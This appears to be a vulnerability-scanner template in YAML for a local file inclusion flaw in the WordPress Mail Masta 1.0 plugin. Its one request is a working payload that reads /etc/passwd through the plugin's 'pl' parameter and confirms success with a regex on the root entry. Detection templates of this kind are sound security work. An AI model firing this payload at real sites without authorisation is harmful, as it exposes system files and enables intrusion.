19 lines
450 B
YAML
19 lines
450 B
YAML
id: wp-mail-masta-lfi
|
|
|
|
info:
|
|
name: WordPress Plugin Mail Masta 1.0 - Local File Inclusion
|
|
author: 0x240x23elu
|
|
severity: high
|
|
reference: https://www.exploit-db.com/exploits/40290
|
|
tags: wordpress,wp-plugin,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body |